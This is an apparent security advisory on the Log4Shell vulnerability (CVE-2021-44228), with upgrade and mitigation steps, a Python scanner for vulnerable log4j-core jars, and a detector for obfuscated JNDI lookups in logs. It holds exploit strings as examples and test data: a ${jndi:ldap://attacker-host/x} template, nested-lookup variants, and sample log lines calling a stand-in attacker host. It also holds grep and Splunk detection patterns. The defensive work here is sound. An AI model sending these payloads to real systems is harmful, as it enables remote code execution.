Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

A serious vulnerability, being called Log4Shell, has been disclosed in the Apache Log4j 2 logging library, which is embedded in a very large amount of Java software.

CI Operators and Developers:
A critical vulnerability (CVE-2021-44228 [1], CVSS 10.0) affecting multiple versions of the Apache Log4j 2 logging library has been disclosed [2]. Successful exploitation results in unauthenticated Remote Code Execution (RCE) [3].

Impact:
Log4j 2 performs string substitution ("lookups") on the messages it logs. A logged string containing a lookup of the form ${jndi:ldap://attacker-host/x} makes the library perform a JNDI lookup against the attacker's server, which can return a reference to a remote Java class that the JVM then loads and executes. Any configuration in which remote input (HTTP headers such as User-Agent, form fields, usernames, chat messages, and so on) reaches a Log4j log statement is therefore exploitable; no authentication is needed. Depending on the JVM version and the classes present on the classpath, the attacker can obtain arbitrary code execution, and even where remote class loading is blocked the outbound LDAP/RMI/DNS connection still confirms the target is vulnerable [4].

Affected Software: 
Apache Log4j 2.x, versions 2.0-beta9 through 2.14.1 (every release before 2.15.0). Log4j 1.x is not affected by this CVE, since it has no JNDI message lookup, but see the End of Life note below.

Recommendation:
Upgrade every project that uses Apache Log4j 2 to version 2.15.0, the fixed release at the time of writing [5]; check the Apache security page [5] for any later fixed version before deploying. Note that 2.15.0 requires Java 8 or later.

If you are on Log4j 2.10.0 or later and cannot upgrade immediately, you can mitigate by starting the JVM with "-Dlog4j2.formatMsgNoLookups=true" (commonly added to JAVA_OPTS), or by setting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true for the process. This disables lookups in log messages only; it is a stop-gap rather than a fix, and the JVM must be restarted for it to take effect.

Log4j 2 versions before 2.10.0 (the same step also works on any 2.x release) can be mitigated by removing the JndiLookup class from the log4j-core jar file:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Run this once per jar: zip -d takes a single archive, so do not rely on a glob that expands to several files. Afterwards verify that the class no longer appears in the jar listing and restart the JVM, since a running process keeps the already loaded class. Remember that log4j-core is often bundled inside application jars and WAR/EAR files (for example under WEB-INF/lib), where the nested jar must be extracted, patched and repacked.

Log4j v1.x is an End of Life product and will receive no patches for this or any future issue. It is recommended to migrate to Log4j v2.15.0 [6].
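Finding every copy of log4j-core on a host is the hard part of the recommendation above, because the library is frequently bundled inside application jars and WAR files rather than installed on its own. The following Python script, added here as an example and not part of the SGCI/Trusted CI advisory, walks a directory tree, opens each .jar/.war/.ear, recurses into nested jars, reads the Maven pom.properties that log4j-core ships with, and reports whether each copy is fixed (2.15.0 or later), mitigated (JndiLookup.class removed), or vulnerable; it also flags Log4j 1.x by its org/apache/log4j/Logger.class. The entry names are the real ones; the jars built by demo() are constructed stand-ins with dummy class bytes so the script runs offline.

```python
import io
import os
import re
import tempfile
import zipfile

# Entry names as they appear inside real log4j-core / Log4j 1.x jars.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
LOG4J1_CLASS = "org/apache/log4j/Logger.class"   # shipped by Log4j 1.x only
FIXED = (2, 15, 0)                                # first fixed release per the advisory

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Enough for a '< 2.15.0' test."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(x or 0) for x in m.groups()) if m else None

def classify(zf):
    """Status string for an open ZipFile, or None if it does not contain Log4j."""
    names = set(zf.namelist())
    if not any(n.startswith(CORE_PREFIX) for n in names):
        return "log4j-1.x: End of Life, migrate to 2.x" if LOG4J1_CLASS in names else None
    version = "unknown"
    if POM_PROPS in names:
        m = re.search(r"^version=(.+)$", zf.read(POM_PROPS).decode("utf-8", "replace"), re.M)
        if m:
            version = m.group(1).strip()
    ver = parse_version(version)
    has_jndi = JNDI_CLASS in names
    if ver is None:
        state = "present" if has_jndi else "absent"
        return f"log4j-core version unknown: JndiLookup.class {state}, verify manually"
    if ver >= FIXED:
        return f"log4j-core {version}: fixed"
    if not has_jndi:
        return f"log4j-core {version}: JndiLookup.class removed (mitigated, upgrade still recommended)"
    return f"log4j-core {version}: VULNERABLE"

def inspect_archive(source, label, findings, depth=0):
    """Classify one archive and recurse into jars nested in it (fat jars, WAR/EAR WEB-INF/lib)."""
    try:
        with zipfile.ZipFile(source if isinstance(source, str) else io.BytesIO(source)) as zf:
            status = classify(zf)
            if status:
                findings[label] = status
            if depth < 2:   # a shaded jar inside a WAR inside an EAR is as deep as we go
                for n in zf.namelist():
                    if n.endswith(".jar"):
                        inspect_archive(zf.read(n), f"{label}!{n}", findings, depth + 1)
    except zipfile.BadZipFile:
        pass

def scan(root):
    """Walk a directory tree and return {archive_label: status} for every Log4j found."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.endswith((".jar", ".war", ".ear")):
                path = os.path.join(dirpath, f)
                inspect_archive(path, path, findings)
    return findings

def sample_jar_bytes(version, with_jndi=True):
    """Constructed stand-in for log4j-core: real entry names, dummy class bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr(CORE_PREFIX + "LoggerContext.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()

def demo():
    """Build a throwaway tree of constructed jars (one bundled in a WAR) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "lib")
        os.makedirs(lib)
        for name, ver, jndi in [("log4j-core-2.14.1.jar", "2.14.1", True),
                                ("log4j-core-2.15.0.jar", "2.15.0", True),
                                ("log4j-core-2.8.2-patched.jar", "2.8.2", False)]:
            with open(os.path.join(lib, name), "wb") as fh:
                fh.write(sample_jar_bytes(ver, jndi))
        with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
            war.writestr("WEB-INF/lib/log4j-core-2.11.0.jar", sample_jar_bytes("2.11.0"))
        return scan(root)

if __name__ == "__main__":
    for label, status in sorted(demo().items()):
        print(f"{status:75} {label}")
```

To use it on a real host, call scan("/") (or the application directories) instead of demo(); the "archive!nested.jar" labels tell you which WAR or fat jar needs to be repacked after the class is removed or the dependency upgraded. Shaded jars that strip the Maven metadata are reported with an unknown version so they are not silently passed.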

To check logs for attack attempts:

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

If you use Splunk, you can detect attack attempts by adding an alert for:

("jndi:ldap" OR "jndi:rmi" OR "jndi:dns")

Both checks look only for the plain form of the string. Attackers quickly began obfuscating it with nested lookups such as ${${lower:j}ndi:...} or ${${::-j}ndi:...} and with URL encoding, so a clean result means "nothing obvious", not "nothing happened". Also search rotated and compressed logs (zgrep) and review outbound LDAP, RMI and DNS connections from application hosts, which are the other side of a successful lookup.
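The grep and Splunk checks above miss the obfuscated payloads that appeared within hours of disclosure. The script below, added here as an example and not part of the original advisory, first percent-decodes each line, then collapses nested Log4j lookups the way the library would (${lower:x}, ${upper:x} and the ${anything:-default} form all reduce to a literal) until only the ${jndi:scheme: indicator is left, and reports the scheme found. The log lines in SAMPLE_LOG are constructed for the demonstration; 203.0.113.0/24 is a documentation address range, not a real attacker.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. a body with no nested "${" or "}".
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are really looking for once obfuscation is undone.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)

def _resolve(match):
    """Evaluate one innermost lookup the way Log4j would, without touching jndi: itself."""
    body = match.group(1)
    if body.lstrip().lower().startswith("jndi:"):
        return match.group(0)                 # the indicator: keep it
    if ":-" in body:                          # ${whatever:-default} -> default
        return body.split(":-", 1)[1]
    head, sep, rest = body.partition(":")
    if sep and head.strip().lower() == "lower":
        return rest.lower()
    if sep and head.strip().lower() == "upper":
        return rest.upper()
    return match.group(0)                     # env:, sys:, date: ... leave as-is

def normalize(line, max_rounds=10):
    """Undo URL encoding and nested-lookup obfuscation so the plain ${jndi:scheme: form surfaces."""
    text = line
    for _ in range(3):                        # tolerate double/triple percent-encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):               # each round collapses one nesting level
        collapsed = _LOOKUP.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text

def find_jndi_attempts(lines):
    """Return [(line_no, scheme, normalized_line)] for every line carrying a JNDI lookup."""
    hits = []
    for n, raw in enumerate(lines, 1):
        norm = normalize(raw)
        m = _JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm))
    return hits

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://203.0.113.7:1099/b} HTTP/1.1" 404 0',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://203.0.113.7/c}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7Bjndi%3Aldaps%3A%2F%2F203.0.113.7%2Fd%7D HTTP/1.1" 200 612',
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET /?u=${env:HOSTNAME} HTTP/1.1" 200 612',
]

if __name__ == "__main__":
    for n, scheme, norm in find_jndi_attempts(SAMPLE_LOG):
        print(f"line {n}: jndi/{scheme}: {norm}")
```

Feed it real files with find_jndi_attempts(open(path, errors="replace")); the last sample line shows that an ordinary ${env:...} lookup is reported as nothing, so the detector keys on the JNDI scheme rather than on "${" alone. The same normalization logic can be ported to a Splunk or SIEM transform if grep over /var/log is not how your logs are collected.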

As this issue is very new, projects that embed Log4j are likely to release updated versions soon. Apply those releases as they become available, and treat the JVM flag and class removal above as interim measures until you do.

References:

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

[2] https://www.randori.com/blog/cve-2021-44228/

[3] https://github.com/advisories/GHSA-jfh8-c2jp-5v3q 

[4] https://www.lunasec.io/docs/blog/log4j-zero-day/ 

[5] https://logging.apache.org/log4j/2.x/security.html 

[6] https://logging.apache.org/log4j/2.x/manual/migration.html  

How SGCI and Trusted CI can help:

The potential impact of any vulnerability, and therefore the appropriate response, depends in part on operational conditions that are unique to each cyberinfrastructure deployment. Our consultants at Trusted CI cannot provide a one-size-fits-all severity rating and response recommendation for all NSF cyberinfrastructure. Please contact help@sciencegateways.org if you need assistance with assessing the potential impact of this vulnerability in your environment and/or you have additional information about this issue that should be shared with the community.